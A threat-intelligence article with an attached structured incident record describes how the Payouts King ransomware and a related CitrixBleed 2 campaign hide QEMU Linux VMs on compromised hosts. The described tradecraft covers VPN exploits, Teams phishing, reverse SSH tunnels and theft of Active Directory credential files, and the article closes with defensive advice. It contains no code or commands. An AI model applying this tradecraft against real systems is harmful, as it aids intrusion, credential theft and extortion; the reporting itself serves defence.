Payouts King Ransomware Abuses QEMU for Stealthy Attacks
The Payouts King ransomware operation is leveraging the QEMU emulator as a reverse SSH backdoor to deploy hidden virtual machines (VMs) on compromised systems, evading endpoint security detection. QEMU, an open-source virtualization tool, allows attackers to execute malicious payloads, store files, and establish covert remote access tactics previously observed in campaigns by 3AM ransomware, LoudMiner, and CRON#TRAP.
Two Active Campaigns
Cybersecurity firm Sophos identified two distinct campaigns exploiting QEMU:
-
STAC4713 (Payouts King)
- First observed in November 2025, linked to the GOLD ENCOUNTER threat group.
- Initial access via exposed SonicWall VPNs and later through SolarWinds Web Help Desk (CVE-2025-26399).
- More recent attacks used Cisco SSL VPN exploits and Microsoft Teams phishing, tricking employees into installing QuickAssist.
- Attackers deploy a hidden Alpine Linux VM (v3.22.0) via a scheduled task (TPMProfiler), disguising virtual disks as databases or DLLs.
- Tools inside the VM include AdaptixC2, Chisel, BusyBox, and Rclone, with reverse SSH tunnels for persistence.
- Post-infection, they exfiltrate NTDS.dit, SAM, and SYSTEM hives via SMB and Rclone to remote SFTP servers.
-
STAC3725 (CitrixBleed 2 Exploitation)
- Active since February 2025, targeting NetScaler ADC/Gateway (CVE-2025-5777).
- After compromise, attackers deploy a ZIP archive containing a malicious executable that:
- Installs a service (AppMgmt).
- Creates a local admin user (CtxAppVCOMService).
- Deploys ScreenConnect for persistence.
- A QEMU-based Alpine Linux VM is then launched, where attackers manually install tools like Impacket, KrbRelayx, BloodHound.py, and Metasploit for credential harvesting, AD reconnaissance, and data exfiltration via FTP.
Ransomware Tactics & Attribution
Payouts King employs AES-256 (CTR) + RSA-4096 encryption, intermittent file encryption, and anti-analysis techniques. Ransom notes direct victims to dark web leak sites. Zscaler suggests ties to former BlackBasta affiliates, citing similar initial access methods (e.g., spam bombing, Teams phishing, Quick Assist abuse).
The group also terminates security tools via low-level system calls and establishes persistence through scheduled tasks. Organizations are advised to monitor for unauthorized QEMU installations, suspicious SYSTEM-level tasks, and unusual SSH port forwarding.
SolarWinds cybersecurity rating report: https://www.rankiteo.com/company/solarwinds
SonicWall cybersecurity rating report: https://www.rankiteo.com/company/sonicwall
Cisco cybersecurity rating report: https://www.rankiteo.com/company/cisco
"id": "SOLSONCIS1776457498",
"linkid": "solarwinds, sonicwall, cisco",
"type": "Vulnerability",
"date": "11/2025",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"{'affected_entities': [{'type': 'Organizations using SonicWall VPN, SolarWinds '
'Web Help Desk, Cisco SSL VPN, Microsoft '
'Teams, or NetScaler ADC/Gateway'}],
'attack_vector': ['Exposed SonicWall VPNs',
'SolarWinds Web Help Desk (CVE-2025-26399)',
'Cisco SSL VPN exploits',
'Microsoft Teams phishing (QuickAssist)',
'NetScaler ADC/Gateway (CVE-2025-5777)'],
'data_breach': {'data_encryption': 'AES-256 (CTR) + RSA-4096',
'data_exfiltration': True,
'file_types_exposed': ['NTDS.dit', 'SAM', 'SYSTEM hives'],
'personally_identifiable_information': True,
'sensitivity_of_data': 'High (PII, credentials, system files)',
'type_of_data_compromised': ['Active Directory credentials',
'System hives',
'Personally Identifiable '
'Information (PII)']},
'date_detected': '2025-11',
'description': 'The Payouts King ransomware operation is leveraging the QEMU '
'emulator as a reverse SSH backdoor to deploy hidden virtual '
'machines (VMs) on compromised systems, evading endpoint '
'security detection. QEMU, an open-source virtualization tool, '
'allows attackers to execute malicious payloads, store files, '
'and establish covert remote access tactics previously '
'observed in campaigns by 3AM ransomware, LoudMiner, and '
'CRON#TRAP.',
'impact': {'brand_reputation_impact': 'Potential damage due to data breach '
'and ransomware attack',
'data_compromised': ['NTDS.dit',
'SAM',
'SYSTEM hives',
'Personally Identifiable Information (PII)'],
'identity_theft_risk': 'High (due to PII exposure)',
'operational_impact': 'Disruption due to ransomware encryption and '
'data exfiltration',
'systems_affected': ['SonicWall VPN',
'SolarWinds Web Help Desk',
'Cisco SSL VPN',
'Microsoft Teams',
'NetScaler ADC/Gateway',
'Active Directory']},
'initial_access_broker': {'backdoors_established': ['QEMU-based Alpine Linux '
'VM',
'ScreenConnect',
'Scheduled tasks '
'(TPMProfiler)'],
'entry_point': ['Exposed VPNs',
'Phishing (Microsoft Teams)',
'Exploited vulnerabilities '
'(CVE-2025-26399, CVE-2025-5777)'],
'high_value_targets': ['Active Directory',
'NTDS.dit',
'SAM/SYSTEM hives']},
'investigation_status': 'Ongoing',
'lessons_learned': 'Organizations should monitor for unauthorized QEMU '
'installations, suspicious SYSTEM-level tasks, and unusual '
'SSH port forwarding to detect stealthy ransomware '
'attacks.',
'motivation': 'Financial gain',
'post_incident_analysis': {'corrective_actions': ['Patch management',
'Phishing awareness '
'training',
'Monitoring for QEMU '
'misuse'],
'root_causes': ['Unpatched vulnerabilities',
'Phishing attacks',
'Exposed VPNs']},
'ransomware': {'data_encryption': True,
'data_exfiltration': True,
'ransomware_strain': 'Payouts King'},
'recommendations': ['Patch vulnerable systems (SonicWall VPN, SolarWinds Web '
'Help Desk, NetScaler ADC/Gateway).',
'Monitor for unauthorized QEMU installations and reverse '
'SSH tunnels.',
'Enhance phishing awareness training (e.g., Microsoft '
'Teams phishing).',
'Implement network segmentation and enhanced monitoring.'],
'references': [{'source': 'Sophos'}, {'source': 'Zscaler'}],
'response': {'containment_measures': ['Monitoring for unauthorized QEMU '
'installations',
'Detection of suspicious SYSTEM-level '
'tasks',
'Blocking unusual SSH port forwarding'],
'enhanced_monitoring': 'Recommended for QEMU activity and '
'reverse SSH tunnels',
'third_party_assistance': 'Sophos, Zscaler'},
'threat_actor': ['GOLD ENCOUNTER', 'Former BlackBasta affiliates'],
'title': 'Payouts King Ransomware Abuses QEMU for Stealthy Attacks',
'type': 'Ransomware',
'vulnerability_exploited': ['CVE-2025-26399', 'CVE-2025-5777']}